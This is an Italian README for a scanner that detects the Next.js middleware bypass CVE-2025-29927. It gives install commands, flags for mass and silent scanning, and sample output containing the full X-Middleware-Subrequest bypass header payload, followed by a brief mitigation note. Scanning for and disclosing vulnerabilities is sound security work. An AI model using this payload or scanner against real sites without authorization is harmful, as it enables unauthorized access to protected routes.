
Next.js Middleware Bypass Scanne
CVE-2025-29927 è uno strumento di sicurezza specializzato per rilevare la vulnerabilità di bypass del middleware di Next.js (CVE-2025-29927) che interessa le versioni di Next.js dalla 11.1.4 alla 15.2.2. Questa vulnerabilità critica consente agli attaccanti di aggirare i controlli di sicurezza inviando un header HTTP appositamente predisposto.
La vulnerabilità di bypass del middleware di Next.js (CVE-2025-29927) permette agli attaccanti di eludere i controlli di autorizzazione inviando un header X-Middleware-Subrequest malevolo che confonde la logica di elaborazione del middleware. Ciò può portare a un accesso non autorizzato a risorse e route protette.
Punteggio CVSS: 9.1 (Critico)
# Clone the repository
git clone https://github.com/gotr00t0day/CVE-2025-29927.git
cd CVE-2025-29927
# Install requirements
pip install -r requirements.txt
python CVE-2025-29927.py [-h] [-t TARGET] [-f FILE] [-c CONCURRENCY] [-k] [-s]
-t, --target: Singolo target da scansionare (es. example.com o https://example.com)-f, --file: File contenente l'elenco dei target (uno per riga)-c, --concurrency: Numero di scansioni concorrenti (default: 5)-k, --insecure: Disabilita la verifica del certificato SSL (utile per indirizzi IP)-s, --silent: Modalità silenziosa - mostra solo i target vulnerabiliScansione di un singolo target:
python CVE-2025-29927.py -t example.com
Scansione di più target da un file:
python CVE-2025-29927.py -f targets.txt
Scansione con verifica SSL disabilitata:
python CVE-2025-29927.py -t 192.168.1.1 -k
Scansione automatizzata con modalità silenziosa:
python CVE-2025-29927.py -f targets.txt -k -s
Scansione con un Header personalizzato:
python3 CVE-2025-29927.py -t target -k -s -H "middleware"
Per i target vulnerabili, MiddleWay mostra:
Esempio di output:
[VULNERABLE] https://example.com - Endpoint /admin can be bypassed
Original status: 401
Bypassed status: 200
Bypass header: X-Middleware-Subrequest: src/middleware:nowaf:src/middleware:src/middleware:src/middleware:src/middleware:middleware:middleware:nowaf:middleware:middleware:middleware:pages/_middleware
Per mitigare questa vulnerabilità:
X-Middleware-Subrequest a livello di WAF o serverQuesto strumento è fornito esclusivamente per scopi di ricerca sulla sicurezza e difensivi. Ottenere sempre la dovuta autorizzazione prima di scansionare sistemi di cui non si è proprietari. Gli autori non sono responsabili per un uso improprio di questo strumento.
MIT